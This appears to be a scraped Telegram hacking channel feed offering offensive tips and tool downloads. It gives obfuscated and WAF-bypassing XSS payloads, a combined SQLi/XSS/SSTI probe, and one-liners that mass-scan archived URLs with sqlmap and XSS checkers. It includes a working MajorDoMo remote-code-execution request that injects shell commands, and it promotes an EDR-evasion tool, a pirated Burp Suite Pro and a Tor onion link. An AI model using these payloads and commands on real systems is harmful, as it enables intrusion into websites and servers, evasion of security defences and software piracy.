0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

Advertising: @LearnExploitAds

IR0Day.Today
XSS Tip 🥵

If alert() is being converted to ALERT() and you can use
Like onerror="

𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"

#XSS #tip
——————‌
0Day.Today
@LearnExploit
@Tech_Army
CrimsonEDR

💬
CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.

🔼 Installation:
⚪️ Install dependency:
sudo apt-get install gcc-mingw-w64-x86-64
⚪️ Download repository
⚪️ Compile the project:
cd CrimsonEDR;
chmod +x compile.sh;
./compile.sh

⚠️ Warning:
Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

💻 Example:
.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

😸 Github

⬇️ Download
🔒 LearnExploit

#C #Simulate #Malware #Dev

📣 T.me/BugCod3
📣 T.me/LearnExploit
Payload for XSS + SQLi + SSTI/CSTI !

'"><svg/onload=prompt(5);>{{7*7}}

' ==> for Sql injection

"><svg/onload=prompt(5);> ==> for XSS

{{7*7}} ==> for SSTI/CSTI

#XSS #SQLI

SQLMap from Waybackurls

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

#Sqlmap #BugBounty #Tips

xss oneliner command

echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln

⬇️ Download ( Tools )
🔒 BugCod3 ( ZIP )
🔒 LearnExploit ( BOT )

#XSS #BugBounty #Oneliner #Tips

👁 Burpsuite Pro 👁

🔥 v2024.3.1

🔔 BurpBountyPro_v2.8.0

📂 README (en+ru) included, plz read it before run BS.

🔼 Run this version With Java SE JDK 22

⬇️ Download

#Burpsuite #Pro #Tools

CVE-2024-31497: Critical PuTTY Vulnerability Exposes Private Keys

Link

#cve
——————‌
An interesting search engine where, like on Google, you can find write-ups, payloads, and so on 👌

Link

#writeup #recommended
——————‌
VormWeb - Tor search engine ⚡️

volkancfgpi4c7ghph6id2t7vcntenuly66qjt6oedwtjmyj4tkk5oqd.onion

#Tor #Darkweb
——————‌
MajorDoMo thumb RCE

GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1

#rce #Poc #Exploit
——————‌
Extract IPs from a list of domains, then you can run your fuzzing or manually check them for SDE/BAC, ports, etc.

grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'

#Fuzz #tip
——————‌
Do you know that sqlmap has its own crawler? Run in the background easily:

sqlmap -u 'https://target.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12

#sql #sql_injection
——————‌
Stored Xss payload 🔥

Payload for bypass waf:

<Img Src=OnXSS OnError=confirm("@Learnexploit")>

#xss #Bypass #WAF #Payload
——————‌
Xss Payload 💎

j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:console.log(location)

#xss #Payload
——————‌
XSS can be triggered in the URL itself, no need for parameter injection ⚡️

Payloads:


%3Csvg%20onload=alert(%22@Learnexploit88%22)%3E


%3Cimg%20src=x%20onerror=alert(%22@Learnexploit%22)%3E

#Xss #Payload
——————‌
🌐 Ominis OSINT: Secure Web-Search 🌐

📊 Features:
🚀 Enhanced User Interface: Enjoy a redesigned interface for a seamless experience, suitable for both novice and experienced users.
🔎 Expanded Digital Reconnaissance: Conduct thorough investigations with advanced tools to gather and analyze publicly available information from diverse online sources.
💡 Threading Optimization: Experience faster execution times with optimized threading, improving efficiency and reducing waiting periods during username searches.
📊 Detailed Results: Gain comprehensive insights from search results, including detailed information extracted from various sources such as social profiles, mentions, and potential forum links.
⚙️ Proxy Validation: The tool validates proxies for secure and efficient web requests, ensuring anonymity and privacy during the search process. This feature enhances the reliability of the search results by utilizing a pool of validated proxies, mitigating the risk of IP blocking and ensuring seamless execution of the search queries.
🕵️‍♂️ Human-like Behavior Mimicking: To mimic human-like behavior and avoid detection by anti-bot mechanisms, the tool randomizes user agents for each request. This helps in making the requests appear more natural and reduces the likelihood of being flagged as automated activity.
🛡 Randomized Proxy Agents: In addition to proxy validation, the tool utilizes randomized proxy agents for each request, further enhancing user anonymity. By rotating through a pool of proxies, the tool reduces the chances of being tracked or identified by websites, thus safeguarding user privacy throughout the reconnaissance process.
🔍 Username Search: Searches a list of URLs for a specific username. Utilizes threading for parallel execution. Provides detailed results with URL and HTTP status code.

🔼 Installation:
cd Ominis-Osint
pip install -r requirements.txt
python3 Ominis.py


😸 Github

⬇️ Download
🔒 BugCod3

#Python #Osint #Search #Engin #Tools
